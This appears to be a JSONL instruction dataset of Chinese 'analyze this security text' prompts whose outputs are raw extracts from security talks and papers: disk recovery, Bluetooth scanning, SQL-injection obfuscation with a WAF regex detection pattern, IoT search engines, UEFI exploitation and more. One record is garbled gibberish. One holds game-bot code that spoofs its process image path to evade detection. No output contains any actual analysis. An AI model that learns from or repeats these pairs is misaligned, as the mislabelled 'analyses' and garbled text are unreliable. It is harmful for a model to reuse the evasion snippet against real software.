除了複雜就是複雜這是我使用PC3000UDMA後的感覺 PC3000UDMA主卡反正是我已經用了半年了搞明白的只占三分之 一這東西除了操作復雜還需要大量的經驗有很多說明書上說的 一回事操作起來又一回事在我手裡光榮犧牲的硬盤不下一百塊 了但用起來還是吃力無比這個至少搭上了我一大半的工作時間 啊有時候周末的時間都搭在上面嚴重的投入和產出不成對比 各位不要以為我比你們傻聽說公安系統的買了80套老版本的 PC3000PCI的主卡回去一年下來只有2套還在偶爾用用其他的 直接都扔角落了那些人不比我傻吧 為何大家都狀況外? PC 3000人機介面真的很爛.. 不夠瞭解硬碟的本質工作原理 硬碟有多重故障原因可能性(硬體,韌體 教學人員只是個代理 這行不喜歡有體系的教學 想寫有體系的教學的人又沒 技術.. 多麼痛的領悟 K書跟實務操作幾年 終於略懂這些技術文件在說啥 Call me Master !!!!! (快叫我 大大) 對這種概念不清的又不知整個硬碟韌 體架構的人.操作這些設備很容易把 硬碟弄掛了.. 以下部份為我本來要在企業場講的架 構 現在大家聽到賺到oh !!!! 硬碟啟動流程 (以WD為範例) MCU ROM bootstrap 內部或是外在SPI ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRealtime Bluetooth Device Detection with Blue Hydra Granolocks Zero_Chaos Granolocks Narcissus  Experimenter  Developer  Long walks in the woods  Travel to exotic locations  Hacking the planet  Give great back rubs Zero_Chaos Narcissus  Eagle Scout  Open{Zaurus,Embedded,wrt} Maintainer  Aircrack-ng Developer  Injection/Drivers, airmon-zc  Pentoo Linux Developer  Gentoo Linux Developer  Random Hacker of ARMs  Husband  Father  Random Association of Wireless Researchers (RAWR)  Defcon/Shmoocon/etc Wireless CTF  Far too easily entertained  Not a lawyer Bluetooth Waterfall  Fft screenshot airmon-ng  airmon-ng start hci0 fake screenshot airodump-ng  Airodump-ng fake screenshot Our normal approach is useless...  airmon-ng and airodump-ng errors Bluetooth Proliferation  Random IoT and wearables stats What is Bluetooth  Cheap  Cable replacement  FHSS  No monitor mode :-(  Class  Class 1 100mW (high power devices, Sena dongle)  Class 2 10mW (phone / most laptops)  Class 3 1mW Bluetooth Classic  Discoverable  Non-discoverable Bluetooth Low Energy  General Discoverability  Limited Discoverability  Non-discoverable  Yet somehow still advertises? Basic Bluetooth Security  PIN  Etc  something Prior Art - cracking  Redfang  Btcrack  Crackle  Le pin cracker  Bluesnarfer  Phonebook dumping from old phones Prior Art - discovery  Bluelog  Discoverable classic only  No le support  Mostly a logger  Btscanner  Discoverable classic only  No le support  Unmaintained  Neat gui Prior Art  getting closer  Bluez  Useful documentation and examples  hciconfig  hcitool  Only discoverable classic devices  Lescan works but hard to parse  outdated  Test-scripts bluez-test discovery  Easy to modify  Shows classic and le  Teaches us how to talk to the bluetooth card  Hides some le devices Prior Art - Ubertooth  Ubertooth-scan  Ubertooth-rx  Ubertooth-rx -z Goals  Like airodump-ng and btscanner  Support btle  Find as many extant devices as possible  Database backend  Not interesting in cracking/brute fo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNew Techniques in SQLi Obfuscation SQL never before used in SQL Injection Nick Galbreath @ngalbreath nick@client9.com DEFCON 20 at the Rio in sunny Las Vegas 2012-07-27 Friday 4:20 pm! http://slidesha.re/ MfOiNR Follow along or get the latest version: That's an OH, not a zer0 SQL Specification  http://www.contrib.andrew.cmu.edu/ ~shadow/sql/sql1992.txt  625 pages of plain text  http://savage.net.au/SQL/sql-2003-2.bnf  119 pages of pure BNF  No one implements exactly  Everyone has extensions, exceptions, bugs Regexp Based WAF (?:\\)\\s*when\\s*\\d+\\s*then)|(?:\"\\s*(?:#|--|{))|(?:\\/\\*!\\s?\\d+)|(?:ch(?:a)?r\\s*\\(\\s*\\d)|(?:(?:(n?and|x?or|not)\\s+|\\|\\||\\&\\&)\\s*\\w+\\() (?:[\\s()]case\\s*\\()|(?:\\)\\s*like\\s*\\()|(?:having\\s*[\\s]+\\s*[\\w\\s])|(?:if\\s?\\([\\d\\w]\\s*[=<>~]) (?:\"\\s*or\\s*\"?\\d)|(?:\\\\x(?:23|27|3d))|(?:.?\"$)|(?:(?:[\"\\\\]*(?:[\\d\"]+|[\"]+\"))+\\s*(?:n?and|x?or|not|\\|\\||\\&\\&)\\s*[\\w\"[+&!@(),.-])|(?:[\\w\\s]\\w+\\s*[|-] \\s*\"\\s*\\w)|(?:@\\w+\\s+(and|or)\\s*[\"\\d]+)|(?:@[\\w-]+\\s(and|or)\\s*[\\w\\s])|(?:[\\w\\s:]\\s*\\d\\W+[\\w\\s]\\s*\".)|(?:\\Winformation_schema|table_name\\W) (?:\"\\s*\\*.+(?:or|id)\\W*\"\\d)|(?:\\\")|(?:[\\w\\s\"-]+(?<=and\\s)(?<=or\\s)(?<=xor\\s)(?<=nand\\s)(?<=not\\s)(?<=\\|\\|)(?<=\\&\\&)\\w+\\()|(?:\"[\\s\\d]*[\\w\\s]+\\W*\\d \\W*.*[\"\\d])|(?:\"\\s*[\\w\\s?]+\\s*[\\w\\s]+\\s*\")|(?:\"\\s*[\\w\\s]+\\s*[\\W\\d].*(?:#|--))|(?:\".*\\*\\s*\\d)|(?:\"\\s*or\\s[\\d]+[\\w-]+.*\\d)|(?:[()*<>%+-][\\w-]+[\\w\\s] +\"[,]) (?:\\d\"\\s+\"\\s+\\d)|(?:admin\\s*\"|(\\/\\*)+\"+\\s?(?:--|#|\\/\\*|{)?)|(?:\"\\s*or[\\w\\s-]+\\s*[+<>=(),-]\\s*[\\d\"])|(?:\"\\s*[\\w\\s]?=\\s*\")|(?:\"\\W*[+=]+\\W*\")|(?:\"\\s*[!=|] [\\d\\s!=+-]+.*[\"(].*$)|(?:\"\\s*[!=|][\\d\\s!=]+.*\\d+$)|(?:\"\\s*like\\W+[\\w\"(])|(?:\\sis\\s*0\\W)|(?:where\\s[\\s\\w\\.,-]+\\s=)|(?:\"[<>~]+\") (?:union\\s*(?:all|distinct|[(!@]*)?\\s*[([]*\\s*select)|(?:\\w+\\s+like\\s+\\\")|(?:like\\s*\"\\%)|(?:\"\\s*like\\W*[\"\\d])|(?:\"\\s*(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s \\w]+=\\s*\\w+\\s*having)|(?:\"\\s*\\*\\s*\\w+\\W+\")|(?:\"\\s*[?\\w\\s=.,;)(]+\\s*[(@\"]*\\s*\\w+\\W+\\w)|(?:select\\s*[\\[\\]()\\s\\w\\.,\"-]+from)|(?:find_in_set\\s*\\() (?:in\\s*\\(+\\s*select)|(?:(?:n?and|x?or|not |\\|\\||\\&\\&)\\s+[\\s\\w+]+(?:regexp\\s*\\(|s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 工厂方法Factory Method ### Intent 定义了一个创建对象的接口但由子类决定要实例化哪个类工厂方法把实例化操作推迟到子类 ### Class Diagram 在简单工厂中创建对象的是另一个类而在工厂方法中是由子类来创建对象 下图中Factory 有一个 doSomething() 方法这个方法需要用到一个产品对象这个产品对象由 factoryMethod() 方法创建该方法是抽象的需要由子类去实现 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/f4d0afd0-8e78-4914-9e60-4366eaf065b5.png\"/> </div><br> ### Implementation ```java public abstract class Factory { abstract public Product factoryMethod(); public void doSomething() { Product product = factoryMethod(); // do something with the product } } ``` ```java public class ConcreteFactory extends Factory { public Product factoryMethod() { return new ConcreteProduct(); } } ``` ```java public class ConcreteFactory1 extends Factory { public Product factoryMethod() { return new ConcreteProduct1(); } } ``` ```java public class ConcreteFactory2 extends Factory { public Product factoryMethod() { return new ConcreteProduct2(); } } ``` ### JDK - [java.util.Calendar](http://docs.oracle.com/javase/8/docs/api/java/util/Calendar.html#getInstance--) - [java.util.ResourceBundle](http://docs.oracle.com/javase/8/docs/api/java/util/ResourceBundle.html#getBundle-java.lang.String-) - [java.text.NumberFormat](http://docs.oracle.com/javase/8/docs/api/java/text/NumberFormat.html#getInstance--) - [java.nio.charset.Charset](http://docs.oracle.com/javase/8/docs/api/java/nio/charset/Charset.html#forName-java.lang.String-) - [java.net.URLStreamHandlerFactory](http://docs.oracle.com/javase/8/docs/api/java/net/URLStreamHandlerFactory.html#createURLStreamHandler-java.lang.String-) - [java.util.EnumSet](https://docs.oracle.com/javase/8/docs/api/java/util/EnumSet.html#of-E-) - [javax.xml.bind.JAXBContext](https://docs.oracle.com/javase/8/docs/api/javax/xml/bind/JAXBContext.html#createMarshaller--)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCame Saw Conquered 网络空间中的IoT安全 IDppprince From:中国科学院信息工程研究所 物联网信息安全北京市重点实验室 yanzhaoteng@iie.ac.cn 2016年9月2日星期五2时21分16 秒 Part. 01 引言 1 物联网时代的到来  2013年物联网处于上升期  2014年物联网取代大数据登上了成熟度曲线的最高点  2015年物联网仍位于顶点  联网设备数2015年49亿2020年260亿(Gartner) Emerging Technologies of 2015 物联网终端 电力/工业 轨道交通 家居生活 保密场所 物理空间 IoT 物联网时代的到来 智能家居 智能楼宇 智能电网 可穿戴计算 城市视频监控 城市供水和燃气 泛 在 的 设 备 互 联 物联网带来变革  改变了生活方式的改变更加便利和智能智能家居智能医疗  改变了生产方式提高生产力工业互联网农业互联网  改变了管理模式智慧社区智能城市  推进了社会的发展历程 万物互联到物联网搜索 搜索空间的拓展 从人类世界到物理世界 从文档网页到实体设备 物 理 空 间 物联网体系 物联网搜索使搜索对象从文档网页扩 展到异构实体设备和动态数据流  搜索对象规模与复杂性膨胀  资源容量和复杂程度显著提升  实体资源与服务对应多样化  是物联网潜在的杀手级应用 互联网体系 搜索引擎将庞大复杂的互联网资 源从地址索引映射为内容索引  成为信息与知识发现的入口  提升了用户访问接口的语义层次  降低了用户使用网络资源的门槛  是互联网高速发展的核心催化剂 网 络 空 间 互联网搜索  改变了人们获取信息的获取方式  会议文献期刊论文  电影歌曲歌星影星等娱乐信息  旅游景点  地图  Google  Google Hacking  百度  百度一下你就知道 人肉搜索 物联网搜索  发现设备找到服务  旅游信息-摄像头在线  天气信息  企业产品的分布  多少产品在线分布等  连接在互联网上的品牌排名  安全事件分析和防护  心脏出血漏洞的态势感知  重大安全事件的全球影响分布 物联网搜索引擎  Shodan --黑暗谷歌  John Matherly于2009年发布  第一个物联网设备搜索引擎  采用基于端口和协议标语抓取的方式利用端 口扫描工具在全球IP地址中进行查询并对返 回标语信息进行存储和整理进而提供索引服 务  在全球至少8个地点部署搜索服务器美国东西 海岸中国冰岛法国台湾越南罗马 尼亚捷克等  搜索端口达200多个24h7不间断扫描从 2009年维护至今  最全面最强大的搜索引擎 物联网搜索引擎  发现思科设备  cisco-ios last-modified  14,000+设备使用HTTP服务却未进行认 证设置  没有安全设置的网络摄像头打印机  camera printer default password password:123456等关键字 物联网搜索引擎  Censys  Internet-wide search engine  密西根大学开发的搜索引擎  2015年ACM CCS安全会议上发布  更加偏重于学术研究网络安全协议TLSSSL等  数据更新快(每天更新实时更新)  开放源码  https://github.com/zmap/zgrab  https://github.com/zmap/ztag  提供原数据下载https://scans.io/  应用  可以搜索到互联网上多少设备使用了SSLv3安全协议 以及多少设备存在着心血漏洞 Durumeric Z, Adrian D, Mirian A, et al. A search engine backed by Internet-wide scanning[C]//Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security(CCS). ACM, 2015: 542-553. 2016年9月2日星期五2时21分18 秒 Part. 02 物联网搜索技术 11 网络空间搜索的挑战  目标  发现网络上的服务和设备  搜索速度快  搜索内容全  设备发现的难点挑战  40亿IP的网络空间  多端口网络黑洞  NATFirewall等内网空间探测  设备发现的礼貌性  设备发现的隐蔽性 智 能 设 备 办 公 设 备 监 控 设 备 工 控 设 备 物联网搜索 Came来到你身边 1 Saw看看你是谁 2 Conquered快到碗里来 3 物联网搜索技术  Came来到你身边  快速发现技术  Saw看看你是谁  指纹识别技术  位置定位", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n- 1 6 082 1 2 3 04 0 01 S U LR X MQS Q S X L I X X 1)*) *.*(312*3( ,*3*1)*) 1)*) 1*.*(31.*,*3* *.*(312*3( ,*3*1)*) 1*.*( 31.*,*3* :: = CA:3(1A E 11.::1.::1.1.::11.1. :31()',2:.:1 .: =41:1.::1 1A .1=414111.1 E 11.::1.::1.1.::11.1 .1 =414111.1.:31()',2: .:1 .: =41:1.::1 TOR_a JW 'C '.)(=' = ' '. JW'C LMOWE1WHPRQTSF bp =CE-0,L EECE< EFC= H st\\L 1(('2)0-,EC=EE.E <CEE CE< EFC= H eon1tL EE==ECE E<CEEECE< EFC= vh_O\\PwgMtrc andpQ<=CEpTfStimnlR TWLV\\!\\PW_CMTM\\9M\\WVc WVVM\\WV33VTT!c WVVM\\WV3VM_EM\\W!1 d MMHWSM\\33VTT!c CMTM\\WVOWVO3M%OM\\CMTM\\WVO!1 C\\VOW\\3WVO%OM\\=V\\AIIM\\M C5AWV\\WAW\\ !1 W\\33VTT!c W\\3 1 d \\ac MMHWSM\\3VM_CMMCWSM\\=V\\MOM%IM=V\\W\\!!1 dI\\P9M\\WVI+!c MMHWSM\\3VTT1 d MMHWSM\\3VTT!c VM_DPMILVM_C5AWV\\WCMM%CMMCWSM\\DPMIL!!!%\\I\\!1 d d d TIWVVM\\WVDPMILTMMV\\BVVITMc I\\MCWSM\\WSM\\3VTT1 I\\MRM\\=V\\C\\MIV3VTT1 I\\MRM\\\\\\C\\MIW\\3VTT1 I\\MWWTMIVTWML3ITM1 TWVVM\\WVDPMILCWSM\\!c \\P%WSM\\31 \\ac \\P%W\\3VM_RM\\\\\\C\\MI\\P%WSM\\%OM\\\\\\C\\MI!!1 \\P%W\\%TP!1 \\P%V3VM_RM\\=V\\C\\MI\\P%WSM\\%OM\\=V\\C\\MI!!1 dI\\P9M\\WVI-!c 1 d aVPWVbMLC5AWV\\WCMM%WVVM\\WV!c C5AWV\\WCMM%WVVM\\WV%ILL9TMMV\\\\P!1 d d TWLTWM!c \\P%TWML3\\M1 \\ac \\P%WSM\\%TWM!1 dI\\P=9M\\WVI)!c 1 d d TWLV!c _PTM\\M!c \\ac \\P%TWML!c RM\\WM3\\P%V%MILRM\\!1 WV\\VM1 d dI\\P9M\\WVI-!c 1 d aVPWVbMLC5AWV\\WCMM%WVVM\\WV!c C5AWV\\WCMM%WVVM\\WV%MWM9TMMV\\\\P!1 d TWLLW;M\\<\\\\CMTM\\BMM\\ MM\\#<\\\\CMTM\\BMWVM MWVM!\\PW_=9M\\WV#CMTM\\9M\\WV c V\\W\\31 MMHWSM\\ 3VTT!c W\\3MMHWSM\\%OM\\>WITAW\\!1 d MWVM%M\\WV\\MV\\DaM \\M\\P\\T !1 MWVM%OM\\F\\M!%V\\TV 2WRM\\TIL3G TL0.58/.+++9((8(69/.,:+//8/G _L\\P3(PMOP\\3( WLMIM3G P\\\\0RII%V%WWL\\TOV(%RV\\ITT(_V)%IEMWV3(###G 4 !1 MWVM%OM\\F\\M!%V\\TV 2IIVIM3WLMITM3C5AWV\\W5TM\\%TI4 !1 MWVM%OM\\F\\M!%V\\TV 2MML\\aM3G ITI\\WVRIIITM\\1MWV3(%G WLM3C5AWV\\W5TM\\%TI _L\\P3( PMOP\\3(W\\3G \"W\\\" G \\ITM3ITMTOVIOM3G P\\\\0RII%V%WWL\\TOV(%TOVV\\ITT%P\\TG 4 !1 MWVM%OM\\F\\M!%V\\TV 2VWMML4 !1 MWVM%OM\\F\\M!%V\\TV 2WMV\\4 !1 MWVM%OM\\F\\M!%V\\TV 2VWMML4 !1 MWVM%OM\\F\\M!%V\\TV 2MML4 !1 MWVM%OM\\F\\M!%V\\TV 2WRM\\4 !1 MWVM%OM\\F\\M!%V\\TV 2WLa4 !1 MWVM%OM\\F\\M!%V\\TV 2P\\T4 !1 d / / EG2.3 ... GF.Cexpect.1H 1 dwr.xml Web.xml IJ8JJE8I7DIEJENDQ =NDEND\"JD\"EJQ 7.8PNDEM7", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nS-SDL企业应用实践 关于漏洞风险成本 1. 为什么软件总会有漏洞漏洞是怎么引入的  业务需求引入  产品设计引入  编码引入 2. 如何应对风险  缓解风险  转移风险  接受风险 3. 安全成本  对于企业来说安全投入多少是合适的 什么是S-SDL 不是一种安全技术而是E2E的安全工程能力 也是一种Security Built In的解决方案 目标交付更安全的系统 S-SDL架构 安全策略安全治理 组 织 架 构 培 训 体 系 研 发 流 程 度 量 体 系 工 具 平 台 安全标准规范过程知识库 人 工具 方法 质量 管理 安全是质量属性的一部分将安全融入到质量管理是构建S-SDL的基本条件 软件安全研发流程设计 安全需求 安全设计 安全开发 安全测试 发布及漏洞 管理 持续改进 安全融入开发流程 建立安全需求 1. 分析业务需求对安全的影响 2.来自客户的显性安全需求 3.安全需求基线 3.合规认证需求 安全需求 设计目标 质量门槛 安全设计Security by Design 1.攻击面分析  攻击面最小化 2. 威胁建模  STRIDE威胁建模  攻击树威胁建模 安全规范 威胁库 方案库 安全设计原则 说明 开放设计 安全不依赖于设计的秘密 失败安全 基于允许的访问决策 权限分离 一种保护机制需要两把钥匙来解锁 最小授权 根据业务需求最授权 经济适用 越复杂的东西越容易出漏洞 最小公共化 尽量减多用户间公用的且被所有用户依赖的机 制 完全仲裁 每一次访问都应该进行权限检查 心理可承受 安全机制的设计要易于使用 不轻信 默认不可信 保护薄弱环节 攻击往往在薄弱点发生 纵深防御 不依赖单一的安全机制 代码安全 1. 安全编码规范 2. 代码扫描及告警清理 3. 代码Review 安全函数库 扫描规划定制化 告警清理指导 代码 Review指导 安全测试 1.基于威胁建模的测试 2.Fuzzing 3.己知漏洞扫描 4. 测试问题跟踪 发布及漏洞管理 1. 安全生态建设漏洞收集 2. 漏洞分析排查预警 3. 根因分析", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAugust, 2007 2007 Finjan Software Ltd. All rights reserved. The Inherent Insecurity of Widgets and Gadgets Aviv Raff Iftach Ian Amit Who are we?  Aviv Raff  Security researcher at Finjans MCRC  Iftach Ian Amit  Director of security research at Finjan Introduction - Widgets?  What is a widget?  Widgets are small applications  Provide visual information  Provide access to a frequently used functions  Hosted in an environment called a Widget Engine Introduction - Types of widgets  Website widgets  3rd party application widgets  OS integrated widgets General Issues - Malicious Widgets  Widgets are applications  Applications can include malicious code  Hence, widgets can be malicious General Issues - Vulnerabilities  Widgets are small applications  Often considered too simple to represent a security threat  Widgets are developed without security in mind  Hence, widgets probably have security vulnerabilities General Issues - Attack vectors  Downloadable malicious widgets  Email attachments  Vulnerable widgets  Command injection  Man in the middle attacks  Browser vulnerabilities  Vulnerable websites  XSS  CSRF General Issues - Impact  Session/Account hijacking  Remote denial-of-service  Information leakage  Personal  Corporate  Remote code execution  Exploiting browser vulnerabilities  Download and execute Web widgets - In the Wild  Personalized Portals  iGoogle  Microsoft Live  MyYahoo  Blog systems  WordPress  TypePad  Social networks  MySpace Web widgets - iGoogle  Personalized Portal  Requires a Google Account  Based on HTML and javascript  JS API for widget developers  Mobile support Web widgets - iGoogle - Malicious Widget  Demo Web widgets  Vulnerable Widget  Demo Widget Engines - 3rd party applications  Yahoo widgets (Konfabulator)  Google Desktop  DesktopX  Opera browser Widget Engines - Yahoo Widgets  Previously known as Konfabulator  Recently released version 4.0  Based on HTML like Markup Language and javascript  Some of the widgets require Yahoo account  Mult", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRe: Whats up Johnny? Covert Content Attacks on Email End-To-End Encryption Jens Müller, Marcus Brinkmann, Damian Poddebniak, Sebastian Schinzel, Jörg Schwenk Remember EFAIL? 2  Last year: EFAIL Remember EFAIL? 2  Last year: EFAIL  Major attack with a logo Remember EFAIL? 2  Last year: EFAIL  Major attack with a logo  Novel attack techniques targeting S/MIME + PGP Remember EFAIL? 2  Last year: EFAIL  Major attack with a logo  Novel attack techniques targeting S/MIME + PGP  Today: non-crypto attacks Remember EFAIL? 2  Last year: EFAIL  Major attack with a logo  Novel attack techniques targeting S/MIME + PGP  Today: non-crypto attacks  Targeting encryption and digital signatures Remember EFAIL? 2 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 3 1. Introduction 2. Attacks on Encryption 3. Attacks on Signatures 4. Evaluation 5. Mitigation Overview 3 Technology's promise 4 I. Strong crypto is virtually unbreakable. Technology's promise 4 I. Strong crypto is virtually unbreakable. II. Digital signature will prevail. Math wins. Technology's promise 4 I. Strong crypto is virtually unbreakable. II. Digital signature will prevail. Math wins. Technology's promise claims I. and II. could be bypassed with a single reply to a benign looking email? What if 4 From: alice@good.com To: johnny@good.com Subject: Important news Some ASCII text message Traditional RFC822 email 5 From: alice@good.com To: johnny@good.com Subject: Important news Some ASCII text message Traditional RFC822 email 5 From: alice@good.com To: johnny@good.com Subject: Important news Some ASCII text message Traditional RFC822 email 5 From: alice@good.com To: johnny@good.com Subject: Important news -----BEGIN PGP MESSAGE-----  -----END PGP MESSAGE----- Traditional PGP/Inline 6 From: alice@good.com To: johnny@good.com Subject: Important news -----BEGIN PGP MESSAGE-----  -----END PGP MESSAGE----- Traditional PGP/Inline 6 From: alice@good.com To: johnny@good.com Su", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStaying Connected During a Revolution or Disaster Thomas Wilhelm Introduction / Background Copyright Trustwave 2010 Confidential Speaker Info  Thomas Wilhelm Education  Masters Degrees in Computer Security:  Computer Science  Management  Ph.D. Student in Information Technology:  Information Assurance and Security Signal Intelligence  U.S. Army  SIGINT Analyst / Cryptanalyst Certifications  ISSMP, CISSP, SCSECA, SCNA, SCSA, IEM/IAM Copyright Trustwave 2010 Confidential Current Events Revolutions  Egypt / Middle-East  Orchestrated via social networks  Decentralized Natural Disasters  Tōhoku Earthquake and Tsunami  Hurricane Katrina Copyright Trustwave 2010 Confidential Impact to Telecommunication Loss Impact of Telecommunication Loss  Loss of Life  Limits Response by Emergency Services  Disruption of organized events  Economic Loss We need a method of creating an alternate method of communicating with each other. People could not communicate. It got to the point that people were literally writing messages on paper, putting them in bottles and dropping them from helicopters to other people on the ground. Louisiana Sen. Robert Barham (R) What Happens During Communication Breakdown Copyright Trustwave 2010 Confidential Telecommunication Loss Loss of Communication for Different Reasons Natural Disasters  Wipes out telecommunication infrastructures  Require days to months to re-establish Government Suppression  Infrastructure remains intact  Flip the Switch and it is restored  Historically, down for only a few days Copyright Trustwave 2010 Confidential Natural Disasters Japanese Earthquake & Tsunami Impacted:  Cellular / Landline phones  Power  Transportation  Undersea communication Government / Corporate Response:  Use of loudspeakers  Television news broadcasts  Mobile cellular base stations  Increased of WiFi hotspots Copyright Trustwave 2010 Confidential Natural Disasters Hurricane Katrina Impacted:  Cellular / Landline phones  Local television stations  Power  Transpo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nvoid fake_image_path(WCHAR *img_path) { __asm { // PEB mov eax, fs:[0x30] // _RTL_USER_PROCESS_PARAMETERS mov eax, [eax+0x010] // ImagePathName.Buffer add eax, 0x3C push img_path pop [eax] } } int main() { HWND game = FindWindow(NULL, \"MapleStory\"); while(true) { PostMessage(game, WM_KEYDOWN, VK_CONTROL, 0); PostMessage(game, WM_KEYUP, VK_CONTROL, 0); } } void PressKey(long KeyCode) { unsigned char scan_code = MapVirtualKey(KeyCode, 0); PostMessage(MSHWND, WM_KEYDOWN, KeyCode, 0x0000001 | scan_code << 16); PostMessage(MSHWND, WM_KEYUP , KeyCode, 0xC000001 | scan_code << 16); } lParam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBSODomizer HD  History  HDMI 101  FPGA: WTF?!  Design  Challenges In Debt to Our Friends  Kris Bahnsen (l33tbunni)  Raivis Rengelis (RaivisR)  Parker Dillmann (LonghornEngineer)  #tymkrs This project would not have happened without the help, support, and patience of... The Original BSODomizer  Released at DEFCON 16 (2008)  XGA (1024 x 768) w/ text only  Parallax Propeller, reprogrammable w/ PropClip  2x CR2032 Lithium coin cells  Fully open source  Wanted to learn about FPGAs  Share our work with the hacker community  Create another ridiculous (and possibly useful) project Desired Features  Mischief  Full color, 1080p graphic capability  User-loadable images from SD card  Animated screens  Legit  Screen capture (for pentesting)  Video display calibration  Open source FPGA tool/reference design HDMI 101  High speed, differential signalling  TMDS: 3 DATA + 1 CLK  1080p @ 60Hz is hard and fast  Bit rate: ~3.6GHz  Pixel clock: 148.5MHz  Try doing that with a microcontroller!  High speed processing more efficiently handled by FPGA FPGA: WTF?!  Blank slate of digital logic  Configurable blocks/ connections  Behavior defined w/ schematic or HDL  Design/purchase IP modules to create hardware  System operates in parallel, synchronized to clock(s)  Danger and confusion abounds! FPGA: WTF?!  Blank slate of digital logic  Configurable blocks/ connections  Behavior defined w/ schematic or HDL  Design/purchase IP modules to create hardware  System operates in parallel, synchronized to clock(s)  Danger and confusion abounds! Preliminary Block Diagram FPGA: Cyclone V GX Starter Kit  Cyclone 5CGXFC5C6F27C7N, $179 USD  Performance v. power v. cost  Got up and running in minimal time (~2 days)  Terasic does not provide schematics or PCB layout in native format :( HDMI TX: ADV7513  Serialization converter to reduce resources of FPGA  Included on the C5G dev. kit  We provide RGB + control signals, it magically provides HDMI-compliant TMDS outputs Early Proof of Concept Early Proof of Concept", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWant strong isolation? Just reset your processor. How we can build more secure systems by applying the age-old wisdom of turning it off and on again Anish Athalye, Adam Belay, Frans Kaashoek, Robert Morris, Nickolai Zeldovich Security devices are increasingly common Smartphone apps Custom hardware 2 They are getting better Smaller TCB SMS 2FA Smartphone TOTP Hardware TOTP Smartphone U2F Hardware U2F Hardware Cryptocurrency wallet 3 Paradigm shift 2FA: More secure login on PC Transaction approval, Removes PC from TCB 4 Can we make the PC secure instead? 5  Endless bugs:  Application bugs  OS bugs (kernels > 20M LOC)  Micro-architectural CPU bugs (Spectre, Meltdown, Foreshadow, Zombieload)  Hardware bugs (Rowhammer, RAMBleed) npm install event-stream https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident Transaction approval on simple devices 6 Remove PC from TCB Untrusted PC Trusted hardware (has private key) 7 TX Sign(TX) Remove PC from TCB 8 Not just cryptocurrencies 9 Before: confirm on PC After: must confirm on device, which signs transaction Not just cryptocurrencies 10 Transaction approval everywhere!  11 Transaction approval everywhere!  12 Sharing results in isolation bugs  Some past wallet bugs  Bad argument validation in syscalls  Bad configuration of MPU [Riscure @ Black Hat 2018; Ledger Blog; Trezor Blog] 13 USB SoC: CPU+RAM, Flash, Peripherals Buttons Display Security through physical separation 14 Simulating physical separation 15 Reset-based design 16 CPU RAM CPU RAM UART Flash Buttons Display USB Application core Management core Syscalls: exit() exit_state(state) Runs third-party code; has no persistent state Manages persistent state; never runs third-party code What needs to be reset? 17 CPU RAM CPU RAM UART Flash Buttons Display USB Application core Management core Purging state in a CPU, attempt #1 18 cut power Purging state in a CPU, attempt #2 19 reset! What does reset mean? 20 RISC-V Instruction Set Manual Purging state", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExtreme Privilege Escalation On Windows 8/UEFI Systems Corey Kallenberg Xeno Kovah John Butterworth Sam Cornwell ckallenberg@mitre.org, xkovah@mitre.org jbutterworth@mitre.org, scornwell@mitre.org The MITRE Corporation Approved for Public Release Distribution Unlimited. Case Number 14-2221 Abstract The UEFI specification has more tightly coupled the bonds of the operating system and the platform firmware by providing the well-defined Runtime Service interface between the operating system and the firmware. This interface is more expansive than the interface that existed in the days of conventional BIOS, which has inadvertently increased the attack surface against the platform firmware. Furthermore, Windows 8 has introduced an API that allows accessing this UEFI interface from a privileged userland process. Vulnerabilities in this interface can potentially allow a privileged userland process to escalate its privileges from ring 3 all the way up to that of the platform firmware, which attains permanent control of the very-powerful System Management Mode. This paper discusses two such vulnerabilities that the authors discovered in the UEFI open source reference implementation and the techniques that were used to exploit them. 1 Contents 1 Introduction 3 2 Runtime Services 3 2.1 Variable Interface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2 Capsule Update . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2.1 Capsule Update Initiation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 2.2.2 PEI Phase Capsule Coalescing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 2.2.3 DXE Phase Capsule Processing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 3 Capsule Update Vulnerabilities 6 3.1 Coalescing Vulnerability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 3.2 Envelope Vulnerability . . . . . . . . . . . . ", "category": "text_analysis", "source": "security_papers"}
